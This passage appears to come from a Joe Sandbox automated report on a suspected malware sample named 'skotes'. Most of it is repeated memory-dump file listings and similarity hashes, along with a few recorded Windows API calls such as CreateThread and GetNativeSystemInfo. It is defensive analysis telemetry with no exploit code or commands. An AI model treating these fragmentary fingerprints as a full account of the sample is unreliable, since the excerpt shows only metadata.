                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 89a3781ceb9fea139204dea9b506c431851bf0e766629acfa309498c3140fddf
                                                                                                                                                                                            • Instruction ID: 851f35674768211cb76a3c4b31fbbf73f83fd436b188992fd8684fd9d8848311
                                                                                                                                                                                            • Opcode Fuzzy Hash: 89a3781ceb9fea139204dea9b506c431851bf0e766629acfa309498c3140fddf
                                                                                                                                                                                            • Instruction Fuzzy Hash: F821D6729092087BEB21AB68EC46BAF376BDF41374F104219F9242B2C1DB709E0596E5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00616D11
                                                                                                                                                                                            • Sleep.KERNEL32(00007530), ref: 00616D25
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateSleepThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4202482776-0
                                                                                                                                                                                            • Opcode ID: 824d5f185cf89701c5cf6f846d4f3c1b26ba020d830fd69f0b220b2a8a58c728
                                                                                                                                                                                            • Instruction ID: 90dea7a0a9c1221787ca2d75c813fc01c34333821d81baeb4403f6aa1996b3d7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 824d5f185cf89701c5cf6f846d4f3c1b26ba020d830fd69f0b220b2a8a58c728
                                                                                                                                                                                            • Instruction Fuzzy Hash: D3D04C79BD5314B6F2205760AC0BFA6AA529B0AF51F79584573583F0E0C6E475408BD8
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00608524
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1721193555-0
                                                                                                                                                                                            • Opcode ID: 8658338ce66d992b3cbec3cc72c17ba9de315ff4613e96170cf3c5e8b12b0acb
                                                                                                                                                                                            • Instruction ID: dcbe3fbce73cade2d142a8be01549d80b680fd1f63262df966eb4f7bfc9112e1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8658338ce66d992b3cbec3cc72c17ba9de315ff4613e96170cf3c5e8b12b0acb
                                                                                                                                                                                            • Instruction Fuzzy Hash: 78513670D402089FDB28EB68CD497DEB776DB46314F5042A8E844A73C1EF349EC08B95
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,0063705B,?,?,00000000,00000000), ref: 00637166
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
